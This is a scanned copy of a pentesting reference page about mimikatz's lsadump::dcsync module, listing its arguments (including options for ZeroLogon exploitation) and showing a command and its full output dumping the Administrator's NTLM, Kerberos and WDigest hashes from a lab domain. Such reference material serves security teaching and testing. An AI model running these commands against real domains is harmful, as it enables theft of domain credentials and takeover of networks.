tools.thehacker.recipes
2606:4700:4400::6812:282f
Public Scan
URL:
https://tools.thehacker.recipes/mimikatz/modules/lsadump/dcsync
Submission: On February 23 via manual from IL — Scanned from ES
Form analysis
0 forms found in the DOM
Text Content
DCSYNC

lsadump::dcsync can be used to do a DCSync and retrieve domain secrets (cf. Pass-the-Ticket). This command uses the Directory Replication Service Remote protocol (MS-DRSR) to ask a domain controller to synchronize a specified entry. It is the same protocol that domain controllers use between themselves.

It has the following command line arguments:

/all : DCSync the entire Active Directory database
/user: perform syncing only for the specified user
/export : save the output
/csv : export to CSV
/dc or /kdc: specify the Domain Controller to connect to and gather data
/guid : the GUID of the object to sync credentials. It can be obtained with net::trust.

The following command line arguments of lsadump::dcsync can be used for ZeroLogon exploitation:

/authuser: the domain controller's machine account
/authdomain: the NetBIOS name of the domain
/authpassword: it has to be set to blank ""
/authntlm: use NTLM authentication

    mimikatz # lsadump::dcsync /domain:hacklab.local /user:hacklab\Administrator
    [DC] 'hacklab.local' will be the domain
    [DC] 'DC.hacklab.local' will be the DC server
    [DC] 'hacklab\Administrator' will be the user account
    [rpc] Service : ldap
    [rpc] AuthnSvc : GSS_NEGOTIATE (9)

    Object RDN : Administrator

    ** SAM ACCOUNT **

    SAM Username : Administrator
    Account Type : 30000000 ( USER_OBJECT )
    User Account Control : 00000200 ( NORMAL_ACCOUNT )
    Account expiration : 01/01/1601 01:00:00
    Password last change : 24/09/2021 16:24:41
    Object Security ID : S-1-5-21-2725560159-1428537199-2260736313-500
    Object Relative ID : 500

    Credentials:
      Hash NTLM: b09a14d2d325026f8986d4a874fbcbc7
        ntlm- 0: b09a14d2d325026f8986d4a874fbcbc7
        ntlm- 1: a06b19f88e0432e937a67fb6848e56bd
        lm - 0: b28dd7b27e8cf0d2293087d70fc35769

    Supplemental Credentials:
    * Primary:NTLM-Strong-NTOWF *
        Random Value : a367950918bb2ccabb50ab88e8ffb09f

    * Primary:Kerberos-Newer-Keys *
        Default Salt : HACKLAB.LOCALAdministrator
        Default Iterations : 4096
        Credentials
          aes256_hmac (4096) : 0c1230dca827b75e872b5e5601eb6b76016412b4dd96b4aeb99a59a43490182c
          aes128_hmac (4096) : e52cb5008be21bfe2e8429c74659d925
          des_cbc_md5 (4096) : 4f45e3a7cd34bc83

    * Primary:Kerberos *
        Default Salt : HACKLAB.LOCALAdministrator
        Credentials
          des_cbc_md5 : 4f45e3a7cd34bc83

    * Packages *
        NTLM-Strong-NTOWF

    * Primary:WDigest *
        01 6ca5712f90260e1eb3abd67598e6750a
        02 8dffe5b3aefb6e5ae29e628d2ee96a45
        03 17be46dc199faf9b0bbda5bad36e3d6e
        04 6ca5712f90260e1eb3abd67598e6750a
        05 6fc635e3af189352029ce83a2219fa3c
        06 510782016677b838b585d4f04d23f98a
        07 b358628b75f049cf9e78f5e49bc560a2
        08 c40c4076a86fbf852da4cb4bfa721d74
        09 bf6734b4833bd61834c48fa6533acb9a
        10 3c148f6edbc99e9a489d72fb809ee66b
        11 0a100f8d2212e336adf8c429722d3a8c
        12 c40c4076a86fbf852da4cb4bfa721d74
        13 e649568c12076eba2026544142dc74fd
        14 3ef797336ba53aaf034774a4fe8b06dc
        15 797740715ee8fa059260c583fef36d5e
        16 84aa405aaf242960160143fa357a3c7f
        17 bb9ea6391483fa61fba5dced60ea039c
        18 3871d21dfa14ede3c56b04ffc5970b1c
        19 8e7946ea6e13210cb3ded49e2ff501fa
        20 7480b0f8878e31ee2dcf3507fc2dbf54
        21 2f7b7c9a2ac171f4417a38a52ef89989
        22 3483e4a4ca60cd4b3d0bc66dc900f175
        23 e1fa4a98cdab50c99934120090885d90
        24 e16cb6277ed064c290498037f5dfe5b3
        25 d6b096727b0d7a39cae06afd874247a9
        26 f7a5f95bb7f0d0be1d8fe247b875cb29
        27 e781f3584bf099e0a485657e832c6e74
        28 acb55c0b8828a6660b166fc649708c1c
        29 8fd36767c074ca738a81d5c7298295c3

When running lsadump::dcsync directly on the domain controller, there is no need to specify the domain in /user.

    mimikatz # lsadump::dcsync /user:Administrator /domain:hacklab.local

Last modified 1yr ago